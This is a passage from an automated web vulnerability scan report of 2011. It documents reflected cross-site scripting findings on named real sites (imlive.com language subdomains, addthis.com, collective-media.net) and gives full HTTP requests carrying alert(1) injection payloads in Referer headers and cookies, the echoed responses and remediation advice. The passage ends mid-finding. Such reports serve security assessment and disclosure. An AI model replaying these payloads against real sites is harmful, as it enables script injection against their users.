Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:24 GMT
Connection: close
Content-Length: 20728
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=pu.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=98560'-alert(1)-'35d8e8b408e&iy=dallas&id=44&iu=1&vd=45abd12d-aecf-4a11-8c1f-a3d2332e1d24';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1012. http://pu.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pu.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e7e1'-alert(1)-'d1ec1d083c3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3e7e1'-alert(1)-'d1ec1d083c3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rl3wgs2vc24ape2prxjw5s55; path=/; HttpOnly
Set-Cookie: ppu=; expires=Thu, 27-Jan-2011 14:25:30 GMT; path=/
Set-Cookie: ASP.NET_SessionId=rl3wgs2vc24ape2prxjw5s55; path=/; HttpOnly
Set-Cookie: ppu=; expires=Thu, 27-Jan-2011 14:25:30 GMT; path=/
Set-Cookie: spvdr=vd=acc0cd69-ddd8-4967-bd19-d04833cd9756&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:30 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:29 GMT
Connection: close
Content-Length: 256741
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=pu.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=3e7e1'-alert(1)-'d1ec1d083c3&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=acc0cd69-ddd8-4967-bd19-d04833cd9756';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1013. http://ru.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48c4b'-alert(1)-'aa630895a23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=48c4b'-alert(1)-'aa630895a23

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iyyw1rvd5u5avhvh2vghiufd; path=/; HttpOnly
Set-Cookie: pru=; expires=Thu, 27-Jan-2011 14:25:25 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=iyyw1rvd5u5avhvh2vghiufd; path=/; HttpOnly
Set-Cookie: pru=; expires=Thu, 27-Jan-2011 14:25:25 GMT; path=/
Set-Cookie: spvdr=vd=ad26d161-3f29-42b1-abf6-29a32e22649c&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:25 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:25 GMT
Connection: close
Content-Length: 20303
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=ru.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=48c4b'-alert(1)-'aa630895a23&iy=dallas&id=44&iu=1&vd=ad26d161-3f29-42b1-abf6-29a32e22649c';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1014. http://ru.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa18c'-alert(1)-'e132931c5dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aa18c'-alert(1)-'e132931c5dd

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=k5iln3ykxonjwn45353wpqid; path=/; HttpOnly
Set-Cookie: pru=; expires=Thu, 27-Jan-2011 14:25:30 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=k5iln3ykxonjwn45353wpqid; path=/; HttpOnly
Set-Cookie: pru=; expires=Thu, 27-Jan-2011 14:25:30 GMT; path=/
Set-Cookie: spvdr=vd=6dbc43ba-2ada-4343-a83d-39791503c1f2&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:30 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:29 GMT
Connection: close
Content-Length: 250159
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=ru.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=aa18c'-alert(1)-'e132931c5dd&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=6dbc43ba-2ada-4343-a83d-39791503c1f2';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1015. http://se.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d2d'-alert(1)-'c3f6f59e0c0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=72d2d'-alert(1)-'c3f6f59e0c0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nu4w0b45ssk3dn55c40usvuh; path=/; HttpOnly
Set-Cookie: pse=; expires=Thu, 27-Jan-2011 14:25:27 GMT; path=/
Set-Cookie: ASP.NET_SessionId=nu4w0b45ssk3dn55c40usvuh; path=/; HttpOnly
Set-Cookie: pse=; expires=Thu, 27-Jan-2011 14:25:27 GMT; path=/
Set-Cookie: spvdr=vd=8db8e8e9-46a0-45d8-bfb0-8a88d091bd10&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:27 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:27 GMT
Connection: close
Content-Length: 18089
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=se.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=72d2d'-alert(1)-'c3f6f59e0c0&iy=dallas&id=44&iu=1&vd=8db8e8e9-46a0-45d8-bfb0-8a88d091bd10';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1016. http://se.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de5e2'-alert(1)-'3ba738e3b95 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=de5e2'-alert(1)-'3ba738e3b95

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=d4ymuyz5vlrlxqnybwxqfgfk; path=/; HttpOnly
Set-Cookie: pse=; expires=Thu, 27-Jan-2011 14:25:34 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=d4ymuyz5vlrlxqnybwxqfgfk; path=/; HttpOnly
Set-Cookie: pse=; expires=Thu, 27-Jan-2011 14:25:34 GMT; path=/
Set-Cookie: spvdr=vd=12d3bb4f-0b17-405a-8c7c-520929046dc5&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:34 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:33 GMT
Connection: close
Content-Length: 219716
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=se.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=de5e2'-alert(1)-'3ba738e3b95&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=12d3bb4f-0b17-405a-8c7c-520929046dc5';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1017. http://tr.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tr.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50d83'-alert(1)-'43e531d6dcf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=50d83'-alert(1)-'43e531d6dcf

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=lqdfm52xphpiqhvqsjbar155; path=/; HttpOnly
Set-Cookie: ptr=; expires=Thu, 27-Jan-2011 14:25:36 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lqdfm52xphpiqhvqsjbar155; path=/; HttpOnly
Set-Cookie: ptr=; expires=Thu, 27-Jan-2011 14:25:36 GMT; path=/
Set-Cookie: spvdr=vd=c1baee4a-bf16-40a0-b40b-10ada8aff0bd&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:36 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:35 GMT
Connection: close
Content-Length: 18568
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=tr.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=50d83'-alert(1)-'43e531d6dcf&iy=dallas&id=44&iu=1&vd=c1baee4a-bf16-40a0-b40b-10ada8aff0bd';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1018. http://tr.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tr.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d19fe'-alert(1)-'3e5a0cefaf9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d19fe'-alert(1)-'3e5a0cefaf9

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nqpd3y552hhidx45u5qby525; path=/; HttpOnly
Set-Cookie: ptr=; expires=Thu, 27-Jan-2011 14:25:42 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nqpd3y552hhidx45u5qby525; path=/; HttpOnly
Set-Cookie: ptr=; expires=Thu, 27-Jan-2011 14:25:42 GMT; path=/
Set-Cookie: spvdr=vd=96095777-d5e3-483a-b97f-6ff3054b20ff&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:42 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:42 GMT
Connection: close
Content-Length: 227883
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=tr.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=d19fe'-alert(1)-'3e5a0cefaf9&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=96095777-d5e3-483a-b97f-6ff3054b20ff';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1019. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload f58e6<script>alert(1)</script>92948c436fb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f58e6<script>alert(1)</script>92948c436fb

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 93088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>f58e6<script>alert(1)</script>92948c436fb - Google search</h4>
...[SNIP]...

4.1020. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 405bb"><script>alert(1)</script>f8b1a525fe6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=405bb"><script>alert(1)</script>f8b1a525fe6

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 93102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=405bb"><script>alert(1)</script>f8b1a525fe6" />
...[SNIP]...

4.1021. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.847.CD39C435/ATF

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33bcc'%3balert(1)//f730c6ce108 was submitted in the cli cookie. This input was echoed as 33bcc';alert(1)//f730c6ce108 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.847.CD39C435/ATF HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b333bcc'%3balert(1)//f730c6ce108; nadp=1; rdst4=1; rdst3=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7087
Date: Fri, 28 Jan 2011 16:37:18 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-68756736_1296232638","http://ad.doubleclick.net//bzo.847.CD39C435/ATF;net=bzo;u=,bzo-68756736_1296232638,11d765b6a10b1b333bcc';alert(1)//f730c6ce108,none,;;contx=none;dc=w;btg=?","0","0",true);</scr'+'ipt>
...[SNIP]...

4.1022. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
